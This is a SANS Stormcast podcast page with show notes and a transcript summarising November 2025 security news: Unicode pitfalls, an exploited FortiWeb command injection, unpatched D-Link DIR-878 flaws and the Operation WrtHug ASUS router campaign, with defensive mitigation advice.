Podcast Detail

SANS Stormcast Thursday, November 20th, 2025: Unicode Issues; FortiWeb More Vulns; DLink DIR-878 Vuln; Operation WrtHug and ASUS Routers

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9708.mp3

Unicode Issues; FortiWeb More Vulns; DLink DIR-878 Vuln; Operation WrtHug and ASUS Routers

00:00

My Next Class

Application Security: Securing Web Apps, APIs, and Microservices	Dallas	Dec 1st - Dec 6th 2025
Network Monitoring and Threat Detection In-Depth	Online \| Central European Time	Dec 15th - Dec 20th 2025

… more classes

Unicode: It is more than funny domain names.
Unicode can cause a number of issues due to odd features like variance selectors and text direction issues.
https://isc.sans.edu/diary/Unicode%3A%20It%20is%20more%20than%20funny%20domain%20names./32472

FortiWeb Multiple OS command injection in API and CLI
A second silently patched vulnerability in FortiWeb is already being exploited in the wild.
https://fortiguard.fortinet.com/psirt/FG-IR-25-513

DLink DIR-878 Vulnerability
DLink disclosed four different vulnerabilities in its popular DIR-878 router. The router is end-of-life and DLink will not release patches
https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10475

Operation WrtHug, The Global Espionage Campaign Hiding in Your Home Router
A new report, “Operation WrtHug,” has uncovered a massive, coordinated effort that has compromised thousands of ASUS routers worldwide.
https://securityscorecard.com/blog/operation-wrthug-the-global-espionage-campaign-hiding-in-your-home-router/

iTunes

MP3 Download

RSS Feed

Google

Podbean

Amazon Echo

YouTube

Spreaker

Spotify

Discussion

Application Security: Securing Web Apps, APIs, and Microservices	Dallas	Dec 1st - Dec 6th 2025
Network Monitoring and Threat Detection In-Depth	Online \| Central European Time	Dec 15th - Dec 20th 2025
Application Security: Securing Web Apps, APIs, and Microservices	Orlando	Mar 29th - Apr 3rd 2026
Network Monitoring and Threat Detection In-Depth	Amsterdam	Apr 20th - Apr 25th 2026
Application Security: Securing Web Apps, APIs, and Microservices	San Diego	May 11th - May 16th 2026
Network Monitoring and Threat Detection In-Depth	Online \| Arabian Standard Time	Jun 20th - Jun 25th 2026
Network Monitoring and Threat Detection In-Depth	Riyadh	Jun 20th - Jun 25th 2026
Application Security: Securing Web Apps, APIs, and Microservices	Washington	Jul 13th - Jul 18th 2026

Podcast Transcript

 Hello and welcome to the Thursday, November 20th, 2025
 edition of the SANS Internet Storm Center's Stormcast. My
 name is Johannes Ullrich, recording today from
 Jacksonville, Florida. And this episode is brought to you
 by the SANS.edu undergraduate certificate program in Applied
 Cybersecurity. Today's diary was inspired by the class warm
 malware that we had a couple weeks ago. This was this set
 of Visual Studio Code extensions that injected
 malware. And the malware was sort of invisible because it
 used these Unicode variants selectors, which is one of
 those features that people aren't really aware of that
 even exists in Unicode. And with that, I wanted to
 summarize some of these sort of often overlooked security
 issues when it comes to Unicode. People usually focus
 more on things like lookalike domain names, which personally
 I actually don't really consider such a big deal. Many
 browsers, like in particular Chrome, is pretty good about
 not displaying many of these domain names. But instead, we
 also have the same issue in applications. We do have some
 character conversions that can cause issues like cross-site
 scripting and SQL injection. And then, yeah, variance
 selectors that may appear to display a different text that
 is then actually being interpreted by your system.
 Same with left to right versus right to left text directions
 that can also cause issues with Visual Code reviews. So
 just want to summarize this quickly. There isn't really
 that much to it. But if you have any other ideas about
 important things with Unicode, let me know. I'm thinking
 about doing at least one more follow-up on this with regular
 expressions and Unicode because that's another issue.
 And I think another problem with Unicode is it suffers a
 little bit from the same problem as IPv6 that people
 kind of ignore it. They don't really think they're using it,
 but everybody uses it in some form. If you have a web
 application that does use UTF -8 encoding, which is pretty
 much any web application, you're probably open to
 Unicode attacks in some form. And then apologies, the next
 story should have made it into yesterday's podcast. Just
 missed it. This is yet another FortiWeb issue. FortiNet did
 publish an advisory stating that there is a second
 vulnerability that they recently patched but hadn't
 disclosed yet. Well, they're now coming clear. After all,
 it's already being exploited in the wild and kind of tells
 you that delaying disclosure of these vulnerabilities does
 not necessarily delay exploitation of the
 vulnerabilities, in particular if they're easy to exploit.
 Now, this one has a lower CVS score of 6.7. So it's only
 medium in part because it does require authentication. So
 there is some barrier to actually exploiting this
 arbitrary code execution vulnerability. But well, let's
 flip to some of the consumer devices. And here we have
 first of all D-Link announcing four different vulnerabilities
 in their DIR-878 routers. This is a very popular model, but
 sadly it's out of support. So you won't see any patches for
 these vulnerabilities. If you want to keep the hardware
 alive, your best option is, and I'm not even sure if
 that's an option for this particular model, but to
 install something like OpenWRT or such, that may be an option
 here. Other than that, toss the device, buy a different
 one. That's how you want to patch this. So it's usually
 the upgrade via the trash bin. And security scorecard came
 out with a report documenting an operation that they are
 calling WRT-HUG. This particular attack was directed
 at ASUS routers. It did not use any new vulnerabilities.
 Instead, older ones from 2023 were mostly being used here in
 this particular set of attacks. What's also
 interesting is, and I mentioned this yesterday when
 we talked about the malware that we actually had a diary
 about yesterday, that this also had as a goal to set up a
 relay network. So infrastructure for follow-up
 attacks. Also, security scorecard. It's a company that
 sort of scans the internet for sort of attack surface
 measurements and such. They were able to actually measure
 the size of this particular botnet because the attacker
 here did install a very specific certificate on these
 routers. And they estimated about 50,000 routers were
 affected by this attack. Well, just a couple words here about
 all of the attacks we talked about here. The FortiWeb, the D
 -Link, the ASUS attack. They all have one thing in common,
 and that's that there is actually a reasonably easy way
 to mitigate many of these issues. And that's just
 separating your control planes. So what this refers to
 is, make sure that you limit access to your admin
 interfaces and APIs. So make sure they're only accessible
 from trusted networks like an admin, VLAN, or a VPN, or at
 least in a home setup from your internal network and not
 exposed to the outside world. With that configuration
 setting, you can pretty much prevent like 90% or so of
 these attacks. And it's usually the default setting,
 but sometimes for convenience or so, people are setting up
 remote access to these admin interfaces, like to do remote
 maintenance and the like. Well, if you need that, please
 use a VPN. Well, and that's it for today. Thanks for
 listening. Thanks for liking and subscribing to this
 podcast. As always, special thanks if you're leaving a
 comment with your favorite podcast platform. That's it
 for today, and talk to you again tomorrow. Bye.